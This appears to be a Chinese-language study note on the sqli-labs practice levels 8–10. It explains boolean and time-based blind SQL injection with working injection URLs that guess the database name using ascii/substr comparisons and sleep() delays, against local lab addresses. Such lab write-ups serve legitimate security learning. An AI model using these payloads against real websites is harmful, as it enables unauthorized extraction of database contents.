less 8 9 10时间盲注

 

 

 

 

select if()

select database()

substr((select database()),1,1)

ascii(substr((select database()),1,1))

select if(ascii(substr((select database()),1,1)) > 10, 2,3);

 

 

 

Less-8

第一种方法

 

 

 

加一个单引号  回显消失

 

 

 

加了注释符后 回显又恢复 说明存在注入漏洞

 

 

 

猜列

 

 

 

猜库法一

猜出第一位是s

http://192.168.50.100/sqli/Less-8/?id=1'

  and left((select database()),1)=0x73--+

 

 

 

猜库法二  

或者是使用

http://192.168.50.100/sqli/Less-8/?id=1'

  and ascii(substr((select database()),1,1)) > 16--+

 

 

 

 

 

 

 

 

第二种方法 时间盲注

 

 

 

http://192.168.50.100/sqli/Less-8/?id=1' and

 if(length(database()) = 8,1,sleep(5))--+

• 当为8的时候很快加载，而为其他值得时候加载较慢（5s左右），那就说明此时数据库的长度就是8（security）

 

 

 

 

 

当猜18 时  网页一直链接 且没有回显

 

 

 

 

 

 

 

判断第一位ascii码  以此类推

http://192.168.50.100/sqli/Less-8/

 

?id=1' and

if(ascii(substr((select database()),1,1)) =119, 1,sleep(5)) --+;

 

错误则没有返回值 且加载慢

 

 

 

 

 

 

正确则有返回值 且加载快

http://192.168.50.100/sqli/Less-8/?id=1' and

if(ascii(substr((select database()),1,1)) =115, 1,sleep(5)) --+;

 

 

 

然后用同样的方法—时间盲注，拆解他的表，列，字段信息

 

 

 

 

 

 

Less9

 

 

 

 

 

 

 

http://192.168.50.100/sqli/Less-9/?id=1' and sleep(5) --+

睡5秒  操作缓慢 且回显正确，说明存在注入漏洞

 

 

 

 

 

 

 

• 1. http://127.0.0.1/sqli/Less-9/?id=1‘  order by 3999--+ 当使用order by的时候，此时无论如何都是回显you are in….所以无法使用order by进行判断。
• 2. http://127.0.0.1/sqli/Less-9/?id=1‘ and sleep(5)--+ 当存在注入漏洞时，可以使用延迟注入进行判断，此时若存在漏洞，则睡眠5s之后再返回结果。
• 3. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(length(database())=8,1,sleep(5)); 通过返回时间进行判断，此时如果数据库长度为8，则可以较快返回。
• 4. http://127.0.0.1/sqli/Less-9/?id=1‘ and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>1112,1,sleep(5))--+ 使用less-8中同样的方法进行判断即可!
• 5. 因为盲注属于猜解，推荐使用脚本进行操作。

 

Less10

• 1. http://192.168.50.100/sqli/Less-10/?id=1“ and sleep(11)--+ 只是将less-9中的单引号换成了双引号，其余的均相同。